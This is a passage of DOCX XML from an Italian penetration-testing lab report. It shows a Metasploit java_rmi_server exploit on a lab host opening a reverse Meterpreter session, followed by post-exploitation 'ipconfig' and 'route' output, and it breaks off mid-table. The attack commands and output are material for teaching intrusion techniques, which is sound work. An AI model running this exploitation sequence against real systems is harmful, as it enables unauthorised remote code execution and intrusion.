                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msf exploit(multi/misc/java_rmi_server) &gt; exploit</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.11.111:4444</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.11.112:1099 - Using URL: http://192.168.11.111:8080/OtCxlw5N5k117ib</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.11.112:1099 - Server started.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.11.112:1099 - Sending RMI Header...</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.11.112:1099 - Sending RMI Call...</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.11.112:1099 - Replied to request for payload JAR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Sending stage (58073 bytes) to 192.168.11.112</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Meterpreter session 1 opened (192.168.11.111:4444 -&gt; 192.168.11.112:40228) at 2026-07-24 10:31:12 +0200</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esecuzione ha avuto esito positivo, con apertura della sessione Meterpreter identificata come session 1, stabilendo un canale di comunicazione tra l'host attaccante (192.168.11.111:4444) e l'host vittima (192.168.11.112:40228). Il meccanismo di sfruttamento ha previsto la pubblicazione di un archivio JAR malevolo tramite un server HTTP temporaneo istanziato da Metasploit stesso, successivamente richiamato dal servizio RMI vulnerabile, con conseguente esecuzione di codice arbitrario sul sistema bersaglio.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Fase 4 — Raccolta delle Evidenze Post-Exploitation</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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ottenuta la sessione Meterpreter, si è proceduto, in conformità con quanto richiesto dalla consegna dell'esercizio, alla raccolta di evidenze relative alla configurazione di rete e alla tabella di instradamento della macchina compromessa.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 Configurazione di rete della macchina vittima</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tramite il comando ipconfig è stata acquisita la configurazione delle interfacce di rete attive sul sistema remoto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="9285.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81">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter &gt; ipconfig</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Interface 1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Name         : lo - lo</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IPv4 Address : 127.0.0.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IPv4 Netmask : 255.0.0.0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Interface 2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Name         : eth0 - eth0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IPv4 Address : 192.168.11.112</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IPv4 Netmask : 255.255.255.0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IPv6 Address : fe80::a00:27ff:fe47:ff99</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 Tabella di instradamento della macchina vittima</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Successivamente, tramite il comando route, è stata acquisita la tabella di routing del sistema remoto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10"/>
        <w:tblW w:w="9315.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8F">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">meterpreter &gt; route</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IPv4 network routes</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
